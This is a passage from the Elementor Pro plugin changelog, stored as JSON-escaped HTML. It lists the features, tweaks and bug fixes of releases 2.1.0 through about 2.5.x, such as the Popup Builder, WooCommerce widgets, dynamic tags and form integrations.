href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7619\\\">#7619<\\/a>)<\\/li>\\n<li>Tweak: Renamed action hook from <code>elementor_pro\\/{$widget_name}\\/query\\/{$query_id}<\\/code> to <code>elementor\\/query\\/{$query_id}<\\/code><\\/li>\\n<li>Tweak: Renamed filter hook from <code>elementor_pro\\/query_control\\/get_query_args\\/current_query<\\/code> to <code>elementor\\/query\\/get_query_args\\/current_query<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.5.0 - 2019-03-26<\\/h4>\\n<ul>\\n<li>New: Introducing Motion Effects including Scrolling & Mouse effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/72\\\">#72<\\/a>)<\\/li>\\n<li>New: Introducing Related Posts for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7306\\\">#7306<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7490\\\">#7490<\\/a>)<\\/li>\\n<li>New: Introducing Date query for Query Control<\\/li>\\n<li>New: Introducing Sticky Posts support for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2501\\\">#2501<\\/a>)<\\/li>\\n<li>Tweak: Added option to open a Popup by a custom selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6871\\\">#6871<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6876\\\">#6876<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Option to count when Popup is closed in "Show up to X times" Advanced Rule<\\/li>\\n<li>Tweak: Added full border radius control options inside Popup<\\/li>\\n<li>Tweak: Changed exit intent icon in Popups<\\/li>\\n<li>Tweak: Show only one popup in its own preview<\\/li>\\n<li>Tweak: Added responsive support to Popup entrance animation control<\\/li>\\n<li>Tweak: Conditions - Singular <code>All Pages<\\/code> string changed to <code>Pages<\\/code><\\/li>\\n<li>Tweak: Added form field shortcode support for Drip tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7000\\\">#7000<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6779\\\">#6779<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6986\\\">#6986<\\/a>)<\\/li>\\n<li>Tweak: Decrease <code>z-index<\\/code> for Nav Menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6869\\\">#6869<\\/a>)<\\/li>\\n<li>Tweak: Changed "Scrolling Effects" section label to "Motion Effects"<\\/li>\\n<li>Tweak: Use filter <code>get_meta_viewport<\\/code> for header templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7043\\\">#7043<\\/a>)<\\/li>\\n<li>Tweak: use filterable <code>Util::get_public_post_types()<\\/code> in Theme Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7172\\\">#7172<\\/a>)<\\/li>\\n<li>Tweak: Added Cloudflare rocket-loader support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7443\\\">#7443<\\/a>)<\\/li>\\n<li>Tweak: Added responsive support to WC Products Columns & Rows Gap controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6913\\\">#6913<\\/a>)<\\/li>\\n<li>Tweak: WC Menu cart "View Cart" & "Checkout" buttons styling<\\/li>\\n<li>Fix: Custom ID reset to default when dragging repeater<\\/li>\\n<li>Fix: Conflict between archive-products widget and WC customizer<\\/li>\\n<li>Fix: Add to Cart widget <code>spacing<\\/code> and <code>space-between<\\/code><\\/li>\\n<li>Fix: Library view when creating a new Header or Footer<\\/li>\\n<li>Fix: Post types labels missing on Add New Template modal<\\/li>\\n<\\/ul>\\n<h4>2.4.8 - 2019-03-11<\\/h4>\\n<ul>\\n<li>Fix: Missing query section in Products widget<\\/li>\\n<li>Fix: Missing Taxonomy controls in Products widget in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.7 - 2019-03-06<\\/h4>\\n<ul>\\n<li>Fix: Compatibility Global Widget with Elementor v2.5.0+<\\/li>\\n<\\/ul>\\n<h4>2.4.6 - 2019-03-04<\\/h4>\\n<ul>\\n<li>Fix: Pods gallery dynamic when empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7127\\\">#7127<\\/a>)<\\/li>\\n<li>Fix: Duplicate call for conditions screen issue<\\/li>\\n<li>Fix: Compatibility with Elementor v2.5.0<\\/li>\\n<\\/ul>\\n<h4>2.4.5 - 2019-02-18<\\/h4>\\n<ul>\\n<li>Fix: Image size issue in Testimonial Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7058\\\">#7058<\\/a>)<\\/li>\\n<li>Fix: MailChimp groups not saved in a form integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7083\\\">#7083<\\/a>)<\\/li>\\n<li>Fix: Show popup preview only on it\'s own preview<\\/li>\\n<li>Fix: Elementor dashboard templates URL corrupted links in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.4 - 2019-02-11<\\/h4>\\n<ul>\\n<li>Tweak: Added ACF Date Time Picker field support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6690\\\">#6690<\\/a>)<\\/li>\\n<li>Tweak: Changed the term of <code>All Posts<\\/code> condition to <code>Posts<\\/code><\\/li>\\n<li>Fix: Added <code><IfModule><\\/code> to avoid 500 error when <code>mod-headers<\\/code> is missing (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7034\\\">#7034<\\/a>)<\\/li>\\n<li>Fix: Include post CSS deletion in Global Widget update (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6856\\\">#6856<\\/a>)<\\/li>\\n<li>Fix: <code>Textarea<\\/code> default value in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6934\\\">#6934<\\/a>)<\\/li>\\n<li>Fix: MailPoet latest version caused fatal error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6996\\\">#6996<\\/a>)<\\/li>\\n<li>Fix: Fatal Error caused by calling MailPoet deleted method<\\/li>\\n<li>Notice: MailPoet <code>Auto Confirm<\\/code> option will now default to "On"<\\/li>\\n<\\/ul>\\n<h4>2.4.3 - 2019-01-30<\\/h4>\\n<ul>\\n<li>Fix: Custom Add to Cart widget responsive alignment settings<\\/li>\\n<li>Fix: Links in Post Info widget<\\/li>\\n<li>Fix: WooCommerce <code>View Cart<\\/code> string translate<\\/li>\\n<li>Fix: Wrapper classes for header\\/footer templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6884\\\">#6884<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.4.2 - 2019-01-25<\\/h4>\\n<ul>\\n<li>Tweak: Added pixel units to Close Button position control in Popups<\\/li>\\n<li>Fix: Exclude error in WC Products widget<\\/li>\\n<\\/ul>\\n<h4>2.4.1 - 2019-01-24<\\/h4>\\n<ul>\\n<li>Tweak: Added CSS classes control to Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6826\\\">#6826<\\/a>)<\\/li>\\n<li>Tweak: Added responsive image size to Testimonial Carousel widget<\\/li>\\n<li>Fix: PHP warning when Toolset Date dynamic is empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6842\\\">#6842<\\/a>)<\\/li>\\n<li>Fix: Support of exclude-ids in WC Products widget<\\/li>\\n<li>Fix: Popup close button not clickable<\\/li>\\n<li>Fix: Alignment justify issue of Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6749\\\">#6749<\\/a>)<\\/li>\\n<li>Fix: Bad anchors breaks the page JS<\\/li>\\n<li>Fix: Popup overlay shown when turned off<\\/li>\\n<\\/ul>\\n<h4>2.4.0 - 2019-01-21<\\/h4>\\n<ul>\\n<li>New: Introducing Popup Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/628\\\">#628<\\/a>)<\\/li>\\n<li>New: Added <code>Popup<\\/code> Dynamic Tag<\\/li>\\n<li>New: Added <code>Popup<\\/code> forms action after submit<\\/li>\\n<li>New: Added User Info dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6322\\\">#6322<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for "Nothing Found" message<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/theme_builder\\/archive\\/escape_nothing_found_message<\\/code> Filter to avoid HTML escaping in "Nothing Found" message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6053\\\">#6053<\\/a>)<\\/li>\\n<li>Tweak: Added <code>add_doc_to_location<\\/code> method to Allow insertion of a document to a location<\\/li>\\n<li>Fix: <code>z-index<\\/code> issue with CTA widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6486\\\">#6486<\\/a>)<\\/li>\\n<li>Fix: Hide the Post Content widget and show it only in a Single document<\\/li>\\n<li>Fix: <code>selector<\\/code> replacement in Custom CSS<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> on the real content only<\\/li>\\n<li>Fix: CSS for WC products selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6559\\\">#6559<\\/a>)<\\/li>\\n<li>Fix: Odnoklassniki share URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6638\\\">#6638<\\/a>)<\\/li>\\n<li>Fix: Custom link new tab in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5766\\\">#5766<\\/a>)<\\/li>\\n<li>Fix: <code>nofollow<\\/code> link in Flip Box & CTA widgets<\\/li>\\n<li>Fix: Post Terms in Post Info widget<\\/li>\\n<li>Fix: Added screen reader to some icons & buttons for better accessibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5386\\\">#5386<\\/a>)<\\/li>\\n<li>Fix: Accessibility labels in Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6630\\\">#6630<\\/a>)<\\/li>\\n<li>Fix: Link to cart page not working when WooCommerce Subscriptions is active<\\/li>\\n<li>Fix: MailChimp Selected list not showing on reloading in Form widget<\\/li>\\n<li>Fix: Sub-menu arrow position in Nav Menu widget<\\/li>\\n<li>Fix: Conflict with WP Security Audit Log plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6648\\\">#6648<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.3.1 - 2018-12-19<\\/h4>\\n<ul>\\n<li>Fix: Template widget search functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6473\\\">#6473<\\/a>)<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> filter to post content in theme builder<\\/li>\\n<\\/ul>\\n<h4>2.3.0 - 2018-12-17<\\/h4>\\n<ul>\\n<li>New: Introducing Discord Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4218\\\">#4218<\\/a>)<\\/li>\\n<li>New: Introducing Slack Integration for Forms<\\/li>\\n<li>New: Introducing MailerLite Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4462\\\">#4462<\\/a>)<\\/li>\\n<li>New: Activate Elementor Pro plugin by connecting to Elementor account<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/utils\\/get_public_post_types<\\/code> filter hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5900\\\">#5900<\\/a>)<\\/li>\\n<li>Tweak: Added <code>loop_start<\\/code> & <code>the_content<\\/code> hooks for Post Content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6173\\\">#6173<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from Page Settings<\\/li>\\n<li>Tweak: Always add the Custom CSS control to the Advanced tab<\\/li>\\n<li>Fix: In sub Term condition false positive in edge cases<\\/li>\\n<li>Fix: ToolSet Dynamic Image fallback<\\/li>\\n<li>Fix: Style glitch with the dropdown color in Nav Menu widget<\\/li>\\n<li>Fix: Style glitch in the Conditions screen in Safari browser<\\/li>\\n<li>Fix: Ribbon in the CTA widget obscures drop down menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6080\\\">#6080<\\/a>)<\\/li>\\n<li>Fix: The color of label won\'t change color in Widget login<\\/li>\\n<\\/ul>\\n<h4>2.2.5 - 2018-12-11<\\/h4>\\n<ul>\\n<li>New: Add Style Tab & Custom CSS for Header & Footer Templates.<\\/li>\\n<li>Tweak: Added a better identifier for subpages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6362\\\">#6362<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from page settings<\\/li>\\n<li>Fix: Yahoo event URL date issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Allow timezone settings in Google event URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Avoid <code>z-index<\\/code> changes by <code>nanocss<\\/code> in build process<\\/li>\\n<li>Fix: Added missing WC upsells products CSS<\\/li>\\n<li>Fix: Nav Menu dropdown losing color on hover<\\/li>\\n<li>Fix: WC Product Add-ons CSS compatibility<\\/li>\\n<\\/ul>\\n<h4>2.2.4 - 2018-12-04<\\/h4>\\n<ul>\\n<li>Fix: Global widget not saving changes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6340\\\">#6340<\\/a>)<\\/li>\\n<li>Fix: Dynamic tags support in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6334\\\">#6334<\\/a>)<\\/li>\\n<li>Fix: Forms Redirect URL action when using form field values with spaces<\\/li>\\n<\\/ul>\\n<h4>2.2.3 - 2018-11-29<\\/h4>\\n<ul>\\n<li>Fix: Missing "Edit Template" in Template widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Follow menu anchors with UTF8 characters in Nav Menu<\\/li>\\n<li>Fix: Show only supported templates in Template widget<\\/li>\\n<li>Fix: Revert conflicting fix for a default order for WC archive<\\/li>\\n<\\/ul>\\n<h4>2.2.2 - 2018-11-28<\\/h4>\\n<ul>\\n<li>Fix: Lightbox dynamic tag crashes the editor<\\/li>\\n<\\/ul>\\n<h4>2.2.1 - 2018-11-28<\\/h4>\\n<ul>\\n<li>New: Added <code>ACF File<\\/code> Dynamic tag to support text controls.<\\/li>\\n<li>Tweak: Added option to hide item count bubble when cart is empty in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6223\\\">#6223<\\/a>)<\\/li>\\n<li>Tweak: Added Actions group for Lightbox and Contact URL tags<\\/li>\\n<li>Tweak: Added filter <code>elementor_pro\\/dynamic_tags\\/shortcode\\/should_escape<\\/code> to avoid escaping in Shortcode dynamic tag<\\/li>\\n<li>Tweak: MailPoet3 integration allow Subscriber to to subscribe to multiple lists<\\/li>\\n<li>Tweak: Added front-end max file size validation for upload fields<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> per Post-Type condition for theme builder<\\/li>\\n<li>Fix: Template widget panel not showing the selected template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Conflict between ACF with Safari browser on Select option in Dynamic tag<\\/li>\\n<li>Fix: Add post classes only for the Single template<\\/li>\\n<li>Fix: Set document type as not editable for unsupported document like Global widget<\\/li>\\n<li>Fix: Avoid duplicate query for current WC product query<\\/li>\\n<li>Fix: Product Archive showing oldest products instead of latest<\\/li>\\n<li>Fix: CSS reset in Posts widget using cards skin<\\/li>\\n<\\/ul>\\n<h4>2.2.0 - 2018-11-19<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/290\\\">#290<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3990\\\">#3990<\\/a>)<\\/li>\\n<li>New: Added evergreen option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4459\\\">#4459<\\/a>)<\\/li>\\n<li>New: Added expire actions option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5242\\\">#5242<\\/a>)<\\/li>\\n<li>New: Introducing Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3854\\\">#3854<\\/a>)<\\/li>\\n<li>New: Introducing Sitemap widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5594\\\">#5594<\\/a>)<\\/li>\\n<li>New: Added Request Parameter dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4934\\\">#4934<\\/a>)<\\/li>\\n<li>New: Added Shortcode dynamic tag<\\/li>\\n<li>New: Added Image and Video Lightbox dynamic tag<\\/li>\\n<li>New: Added Contact URL dynamic tag<\\/li>\\n<li>New: Added Featured Image Data dynamic tag<\\/li>\\n<li>New: Added default value to each field in the Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4268\\\">#4268<\\/a>)<\\/li>\\n<li>New: Added "Any Child Of" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5321\\\">#5321<\\/a>)<\\/li>\\n<li>New: Added "In Child" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5587\\\">#5587<\\/a>)<\\/li>\\n<li>Tweak: Added Form Redirect URL with form values (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2564\\\">#2564<\\/a>)<\\/li>\\n<li>Tweak: Added default post classes to template wrapper (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5959\\\">#5959<\\/a>)<\\/li>\\n<li>Tweak: Better labels for terms in Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6092\\\">#6092<\\/a>)<\\/li>\\n<li>Tweak: Renamed "Child Of" templates condition to "Direct Child Of"<\\/li>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/condition_sub_id<\\/code> filter hook to allow template condition translations<\\/li>\\n<li>Tweak: Load the Template Library widget via Ajax for better performance<\\/li>\\n<li>Tweak: Added 404 page title for Page Title dynamic tag<\\/li>\\n<li>Fix: Menu Cart Toggle has # URL link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6141\\\">#6141<\\/a>)<\\/li>\\n<li>Fix: Alignment issue in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5790\\\">#5790<\\/a>)<\\/li>\\n<li>Fix: Avoid potential security risk in forms<\\/li>\\n<li>Fix: Template By Author condition conflicts with 404 page<\\/li>\\n<li>Fix: Restored WC Product Content widget in Single Product template<\\/li>\\n<li>Fix: Theme Builder Preview URLs for date archives and 404 pages<\\/li>\\n<li>Fix: Highlight active menu anchor items only when scrolled into view<\\/li>\\n<li>Fix: Carousel Pagination Progress style to support new Swiper version<\\/li>\\n<\\/ul>\\n<h4>2.1.13 - 2018-11-12<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for new brand Finder in v2.3.0<\\/li>\\n<li>Fix: Settings conflict when there are multiple carousels in the page<\\/li>\\n<\\/ul>\\n<h4>2.1.12 - 2018-11-05<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.3<\\/li>\\n<li>Tweak: Better performance for Template Library widget<\\/li>\\n<li>Fix: Fatal error if a taxonomy used in a dynamic field is removed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6029\\\">#6029<\\/a>)<\\/li>\\n<li>Fix: Date Time dynamic tag now respect site language (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6001\\\">#6001<\\/a>)<\\/li>\\n<li>Fix: Custom CSS printed twice in the front-end<\\/li>\\n<li>Fix: ACF Image field PHP warning (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6051\\\">#6051<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.1.11 - 2018-10-22<\\/h4>\\n<ul>\\n<li>New: Added ACF local fields compatibility<\\/li>\\n<li>Tweak: Re-brand TypeKit by Adobe Fonts integration<\\/li>\\n<li>Fix: Exclude <code>is_embed<\\/code> from Singular condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5915\\\">#5915<\\/a>)<\\/li>\\n<li>Fix: Avoid conflict with Ad Blockers and Share Buttons<\\/li>\\n<li>Fix: Current date time dynamic tag now shows local time<\\/li>\\n<li>Fix: Avoid conflict with 3rd party plugins that filter the permalink<\\/li>\\n<li>Fix: Avoid PHP warning when no groups are selected for MailChimp integration<\\/li>\\n<li>Fix: Avoid PHP warning if checkbox field is empty for ACF<\\/li>\\n<li>Fix: Respect password protected for a WC single product template<\\/li>\\n<li>Fix: Respect <code>order<\\/code> settings for WC archive also without pagination<\\/li>\\n<\\/ul>\\n<h4>2.1.10 - 2018-10-09<\\/h4>\\n<ul>\\n<li>Tweak: Added responsive alignment control for Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5821\\\">#5821<\\/a>)<\\/li>\\n<li>Tweak: Added link control to Animated Headline widget<\\/li>\\n<li>Fix: Mobile nav menu jump on RTL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5711\\\">#5711<\\/a>)<\\/li>\\n<li>Fix: Responsive alignment control in Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5830\\\">#5830<\\/a>)<\\/li>\\n<li>Fix: Added IE compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Post Content widget is now shown only on <code>Single<\\/code> templates<\\/li>\\n<li>Fix: Query Control Pagination with offset<\\/li>\\n<\\/ul>\\n<h4>2.1.9 - 2018-09-17<\\/h4>\\n<ul>\\n<li>Tweak: Added Centered Slides option for Slideshow carousel<\\/li>\\n<li>Fix: Allow only public CPT for Manual Selection in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5091\\\">#5091<\\/a>)<\\/li>\\n<li>Fix: ACF Gallery option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: Page scrolling on resize when sticky is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5740\\\">#5740<\\/a>)<\\/li>\\n<li>Fix: Edit custom name for Global Widget in the Navigator (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5689\\\">#5689<\\/a>)<\\/li>\\n<li>Fix: Coverflow transition effect in Carousel<\\/li>\\n<li>Fix: Weird mobile behavior with Cube effect in Carousel<\\/li>\\n<li>Fix: Show the first thumbnail in the Slideshow carousel correctly<\\/li>\\n<\\/ul>\\n<h4>2.1.8 - 2018-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Added styling options for WC Additional Information widget<\\/li>\\n<li>Tweak: Added styling options for \'View Cart\' link in Products widget<\\/li>\\n<li>Fix: 3rd party plugin support for WC single product template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5338\\\">#5338<\\/a>)<\\/li>\\n<li>Fix: Layout of Related Product widget with WC native style<\\/li>\\n<\\/ul>\\n<h4>2.1.7 - 2018-09-03<\\/h4>\\n<ul>\\n<li>New: WC Archive Description widget<\\/li>\\n<li>Tweak: Added blend mode to Slides widget background overlay (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5555\\\">#5555<\\/a>)<\\/li>\\n<li>Tweak: Added \'Current Subcategories\' option to Product Categories widget<\\/li>\\n<li>Fix: Added default vertical alignment in Author Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5589\\\">#5589<\\/a>)<\\/li>\\n<li>Tweak: Added more blend mode options for CTA widget<\\/li>\\n<li>Tweak: Improved plugin updater method based on WordPress version<\\/li>\\n<li>Fix: Improved IE compatibility for Posts and Portfolio widgets<\\/li>\\n<li>Fix: Added default gap for products pagination<\\/li>\\n<li>Fix: Post thumbnail flickering in Safari browser<\\/li>\\n<li>Fix: Close mobile nav menu on click only in full-width mode<\\/li>\\n<li>Fix: Added trailing slash to pagination links in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.1.6 - 2018-08-28<\\/h4>\\n<ul>\\n<li>New: WC Product Category Image widget and Dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5117\\\">#5117<\\/a>)<\\/li>\\n<li>Tweak: Allow HTML in Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5491\\\">#5491<\\/a>)<\\/li>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Tweak: Deprecated Follow option in the Facebook Button widget<\\/li>\\n<li>Fix: Posts widget grid in Safari & IE11 (Depended on Elementor v2.2)<\\/li>\\n<li>Fix: Posts widget CSS when using cards skin in masonry mode<\\/li>\\n<li>Fix: ACF Image & ACF URL option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: WC product gallery links in RTL<\\/li>\\n<li>Fix: Dynamic tags in Call To Action widget<\\/li>\\n<\\/ul>\\n<h4>2.1.5 - 2018-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Fix: Posts Widget layout theme compatibility<\\/li>\\n<li>Fix: Added compatibility for WooCommerce native style<\\/li>\\n<\\/ul>\\n<h4>2.1.4 - 2018-08-19<\\/h4>\\n<ul>\\n<li>Fix: Layout issue compatibility with themes caused by v2.1 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5442\\\">#5442<\\/a>)<\\/li>\\n<li>Fix: Dynamic setting in Pricing Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5460\\\">#5460<\\/a>)<\\/li>\\n<li>Fix: Hide Target URL control if is not necessary in Blockquote widget<\\/li>\\n<li>Fix: Selector specificity for WooCommerce Products widget<\\/li>\\n<li>Fix: WooCommerce conflicts in the editor in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.3 - 2018-08-15<\\/h4>\\n<ul>\\n<li>Fix: Thumbnails in the Posts widget jumping (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5350\\\">#5350<\\/a>)<\\/li>\\n<li>Fix: Responsive grid in the Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5375\\\">#5375<\\/a>)<\\/li>\\n<li>Fix: Added missing <code>setup_postdata<\\/code> for Product Data Tabs widget<\\/li>\\n<li>Fix: Rollback to older version of Flip Box widget to resolve 3D depth issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5399\\\">#5399<\\/a>)<\\/li>\\n<li>Fix: Allowed types in the Upload File field are now case-insensitive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5254\\\">#5254<\\/a>)<\\/li>\\n<li>Fix: Carousel behavior when using a single slide<\\/li>\\n<\\/ul>\\n<h4>2.1.2 - 2018-08-12<\\/h4>\\n<ul>\\n<li>Fix: Error when ACF Pro is not installed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5367\\\">#5367<\\/a>)<\\/li>\\n<li>Fix: Edge cases in Inspector where document is a boolean<\\/li>\\n<li>Fix: Edge cases for incorrect file fields in PODS<\\/li>\\n<\\/ul>\\n<h4>2.1.1 - 2018-08-09<\\/h4>\\n<ul>\\n<li>Fix: Highlighted text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5345\\\">#5345<\\/a>)<\\/li>\\n<li>Fix: Flip Box effect issues<\\/li>\\n<li>Fix: ACF Options page fields support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5329\\\">#5329<\\/a>)<\\/li>\\n<li>Fix: Import Pro templates in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.0 - 2018-08-07<\\/h4>\\n<ul>\\n<li>New: Introducing WooCommerce Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1690\\\">#1690<\\/a>)<\\/li>\\n<li>New: Introducing 12 new dynamic tags & widgets for 